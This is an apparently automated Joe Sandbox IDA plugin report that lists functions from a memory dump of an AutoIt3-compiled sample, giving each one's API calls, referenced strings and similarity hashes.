Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 63264571e9289b4064a0407177a623fba793012eade27f723114ac3f77ff71fa
Instruction ID: 7d0e23003e6c8c5f112b48f96c6c205ebe97dd16901a2b4c16377c2bc047dc4a
Opcode Fuzzy Hash: 63264571e9289b4064a0407177a623fba793012eade27f723114ac3f77ff71fa
Instruction Fuzzy Hash: 739138706206029FDB24CF64C884B6AB7B5FF49711F10846EF94ACB691DBB0E855CB64

Function 0026290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00262A72

Strings

I/), xrefs: 0026297F
I/), xrefs: 002629FC, 00262A64, 00262A12

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscpy
String ID: I/)$I/)
API String ID: 3048848545-1986083685
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: 08d9389cb815f83ec6812983a292b5cbb083822ad9e7bcefe36ea7433c00b651
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: 01410835920A17EACF25DFD8D4519FDB770EF48310F60904AE881A7191DB705EEACBA0

Function 0023BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0023BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0023BCF3

Strings

@, xrefs: 0023BCE8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: bb6fc613c44592fa34b64dcf4547c8ec39ab2b1d5bda6d12632dcbf5c1788bef
Instruction ID: cdb18c321efdd0acfe502eb3a53a4bf96db7245f556699e16ce4a62dfde909f4
Opcode Fuzzy Hash: bb6fc613c44592fa34b64dcf4547c8ec39ab2b1d5bda6d12632dcbf5c1788bef
Instruction Fuzzy Hash: 605118B1418744DBE320AF14D889BAFBBECFB95354F514C4EF1C8410A6DB7099AC8B56

Function 0026C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 002244ED: __fread_nolock.LIBCMT ref: 0022450B

_wcscmp.LIBCMT ref: 0026C65D
_wcscmp.LIBCMT ref: 0026C670

Strings

FILE, xrefs: 0026C5A5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 72f9df05d4f26d43e2445b34d9f8473c343b8332b0d9c7e55e2af52cbf18e6ba
Instruction ID: 7d084e61d4556d414ebec4883ebe9d51569d2ca24dc0a06282f3d196dc532885
Opcode Fuzzy Hash: 72f9df05d4f26d43e2445b34d9f8473c343b8332b0d9c7e55e2af52cbf18e6ba
Instruction Fuzzy Hash: BC41D572A1021ABADF21ABE4DC41FEF77BDEF89714F000069F605EB181D6709A64CB61

Function 0028A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0028A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0028A86F

Strings

', xrefs: 0028A7C3

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: be94d672ba0c407c5c622fd4d42d29be9d2eebbb0937d41cf3df7303df46cb4d
Instruction ID: 1b27d16772fccedab92e91da2d7138d5408f4666de186f521d52a9d5c662acff
Opcode Fuzzy Hash: be94d672ba0c407c5c622fd4d42d29be9d2eebbb0937d41cf3df7303df46cb4d
Instruction Fuzzy Hash: AA41FA78E113099FEB14DF64D881BDABBB9FB08700F14016AE905AB381DB70A951DFA1

Function 0028975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0028980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0028984A

Strings

static, xrefs: 002897AA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: dd44706f17603b2fe6ea446f33ad40addbcfdde723a0c68cd8c284d1e0703fda
Instruction ID: 906f51a8457a7ad35de35f651505fd0810730d8cb0e5235c05a1fddc678928e2
Opcode Fuzzy Hash: dd44706f17603b2fe6ea446f33ad40addbcfdde723a0c68cd8c284d1e0703fda
Instruction Fuzzy Hash: 38317E75120605AEEB10AF74DC80BFB73A9FF59760F048619F8A9C7190CA31ACA1DB60

Function 00265157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002651C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00265201

Strings

0, xrefs: 002651BF

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8edc34a519276af33b7606aea3907364d60927479f466cf1f4b4c4459a2c1d2d
Instruction ID: 15687a70b3386231513e2434c994beb788d73fd4270104624a405e5b3b9c7b05
Opcode Fuzzy Hash: 8edc34a519276af33b7606aea3907364d60927479f466cf1f4b4c4459a2c1d2d
Instruction Fuzzy Hash: E531F871A20716DBEB24CF99D8A5B9EBBF4FF45350F140029ED85A61A0E7B099E4CB10

Function 0027658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00276608

Strings

AUTOITCALLVARIABLE%d, xrefs: 002765FA
, $, xrefs: 00276648

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: cbcf2edc566479e2702d238c49b626fb2ea2006f08625c9e5978b64a7e05a1ef
Instruction ID: 6fc86395135b8c92ef404809008c646f1734ca120a49296bb9c3565654bebb43
Opcode Fuzzy Hash: cbcf2edc566479e2702d238c49b626fb2ea2006f08625c9e5978b64a7e05a1ef
Instruction Fuzzy Hash: B821A031A20129BBCF10EFA4D886EAD77B8AF05700F40405AF409AB181DA74EE35CFA1

Function 002893CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0028945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00289467

Strings

Combobox, xrefs: 00289429

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 649fe03654d59aef42b70e657b7f68f452c087c481ab706944d610cdeab801a8
Instruction ID: 3b30fd1d8b16adead26ae13b592ec7618337bc78c5597316a830fd01dbfd0380
Opcode Fuzzy Hash: 649fe03654d59aef42b70e657b7f68f452c087c481ab706944d610cdeab801a8
Instruction Fuzzy Hash: 2411B6753211097FEF11AE54DC80EBB376EEB893A4F144125F919972D0D6719CA28B60

Function 0028DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

GetActiveWindow.USER32 ref: 0028DA7B
EnumChildWindows.USER32(?,0028D75F,00000000), ref: 0028DAF5

Strings

T1', xrefs: 0028DAFB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1'
API String ID: 3814560230-4154715559
Opcode ID: 73146e0e0b182b2413e5a93f2890e052f4a2b77ef49b54a689b0f1cf120b90bd
Instruction ID: ec1ef2c8d71335f6566c0f16f1b625aaa13cd5149ea0218a0a33b904a2641ae9
Opcode Fuzzy Hash: 73146e0e0b182b2413e5a93f2890e052f4a2b77ef49b54a689b0f1cf120b90bd
Instruction Fuzzy Hash: 93215379255201DFC714EF28E894AA573F9FF49320F250629F96A8B3E0D730A864CF50

Function 002898FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0023D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0023D1BA
Part of subcall function 0023D17C: GetStockObject.GDI32(00000011), ref: 0023D1CE
Part of subcall function 0023D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0023D1D8

GetWindowRect.USER32(00000000,?), ref: 00289968
GetSysColor.USER32(00000012), ref: 00289982

Strings

static, xrefs: 00289945

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 47cdeca43ff1c580f36b7e3dd3f23d407015d2d84ff7ce21cd109a998f4ba0a9
Instruction ID: e079a6c339ac06715efd9f3f75cd2ea946c2e082e19384a42204ca09a003589e
Opcode Fuzzy Hash: 47cdeca43ff1c580f36b7e3dd3f23d407015d2d84ff7ce21cd109a998f4ba0a9
Instruction Fuzzy Hash: 5711297652020AAFDB04EFB8DC45AFA7BA8FB09344F054629F956E2290D734E860DB50

Function 00289617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00289699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002896A8

Strings

edit, xrefs: 0028967D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: a8fa745e679a402beeb5edb9c8992172d607486032d5f9ed7ee3bb680cbb441f
Instruction ID: 9ea0b8fff27891bc5c7c2e8a4eacda039cce548d84aa4f67e2b12b924e406e9b
Opcode Fuzzy Hash: a8fa745e679a402beeb5edb9c8992172d607486032d5f9ed7ee3bb680cbb441f
Instruction Fuzzy Hash: 66119D75521115ABEF106F64EC44AFB376EEB05378F184314F965931E0D7719CA09B60

Function 00265262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002652D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002652F4

Strings

0, xrefs: 002652CE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: f2e33edb23df454aa99051f9a375198b3e8304835357e7e32462be0713c14bd4
Instruction ID: ceb01ca62eed2d084c7343c0a6c9176ac78a1329d78c0a1586abdab358c5f721
Opcode Fuzzy Hash: f2e33edb23df454aa99051f9a375198b3e8304835357e7e32462be0713c14bd4
Instruction Fuzzy Hash: 7711E276D21665ABDB20DFA8D944B9D77B8AF05B54F040065E901E7290D3B0EDB4CB90

Function 00274D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00274DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00274E1E

Strings

<local>, xrefs: 00274DE6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 9174fba52302e986f6d66d2711a6b0bbf86c6f69775a90d32f68dbd65898f1e9
Instruction ID: a875b79e7abed35141facd2b963b4d123363f9f8d353c7e2f8dcdc303e8231cb
Opcode Fuzzy Hash: 9174fba52302e986f6d66d2711a6b0bbf86c6f69775a90d32f68dbd65898f1e9
Instruction Fuzzy Hash: 4D11A070521222FBDB359F51CC88EFBFAA8FF06764F10C22AF55956140D7B05960C6E0

Function 0024A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002537A7
___raise_securityfailure.LIBCMT ref: 0025388E

Strings

(., xrefs: 00253889

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (.
API String ID: 3761405300-2691153352
Opcode ID: cef28f697e742f0d6ba170a3a0e82cc512f32f18a9ef2caa971051fed3e4471d
Instruction ID: 4f8f853403a27071a925be591345ce337d567a71f2844e5b33beac0d2220e634
Opcode Fuzzy Hash: cef28f697e742f0d6ba170a3a0e82cc512f32f18a9ef2caa971051fed3e4471d
Instruction Fuzzy Hash: 4D21F2B5591384CAD704DF54FDCAA507BB0FB4C310F18982AE9088E2A0E3F469D2CB89

Function 0027A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0027A84E
htons.WSOCK32(00000000,?,00000000), ref: 0027A88B

Strings

255.255.255.255, xrefs: 0027A866

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 27a2691ccc7e184b2942caecad221076d276bf93de9c2f4e82a1cc91f5b84a2b
Instruction ID: 5a564d98f0b54972206769d535951a5ec848c64629b1e6f2319fd841a3d715e0
Opcode Fuzzy Hash: 27a2691ccc7e184b2942caecad221076d276bf93de9c2f4e82a1cc91f5b84a2b
Instruction Fuzzy Hash: DC01D675210305ABCB11AFA4D84AFADB364FF85324F20C426F51A9B3D1DB71E8258B56

Function 0025B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0025B7EF

Strings

ListBox, xrefs: 0025B7B9
ComboBox, xrefs: 0025B78B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 7b2ace61693847d407794cb695c15408d715d947f7926426dbe7ae2a1145fc4f
Instruction ID: 2fc85d08c5feb2115bfa82c3c13fbdf415e91f089061138989bd45a564e852d1
Opcode Fuzzy Hash: 7b2ace61693847d407794cb695c15408d715d947f7926426dbe7ae2a1145fc4f
Instruction Fuzzy Hash: 2901F571620128BBCB05EBA4DC529FE7369BF163107100619F862973D1EB705C2C8B54

Function 0025B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0025B6EB

Strings

ListBox, xrefs: 0025B6B5
ComboBox, xrefs: 0025B687

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 79f613b8b8c211169da33e715190e9ba3a01348961170082dce079e72d32d2e2
Instruction ID: 5935cba6f233b8dc1c0eeed4e9002a79e1e0152f1f3f8730c5d611ba88def881
Opcode Fuzzy Hash: 79f613b8b8c211169da33e715190e9ba3a01348961170082dce079e72d32d2e2
Instruction Fuzzy Hash: 5301A775661014BBDB05EBA4D952AFF73AC9F15345F200019B802B7291EBA05E3C8BB9

Function 0025B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0025B76C

Strings

ListBox, xrefs: 0025B738
ComboBox, xrefs: 0025B70A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 056bbf51cfea9b8820f0788365cc4c1433570cf69864c80cfd70ccbf85fc5ff9
Instruction ID: 49f04ba8e3e1549f1792fcb2cfc6af5fb7140e167edb42ee40b3d028dc0fd75a
Opcode Fuzzy Hash: 056bbf51cfea9b8820f0788365cc4c1433570cf69864c80cfd70ccbf85fc5ff9
Instruction Fuzzy Hash: 2F01DB72660114BBD705EBA4D912EFE73AC9B15345F500019B802B3292DB705E3D8BB9

Function 00244D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00244D9E
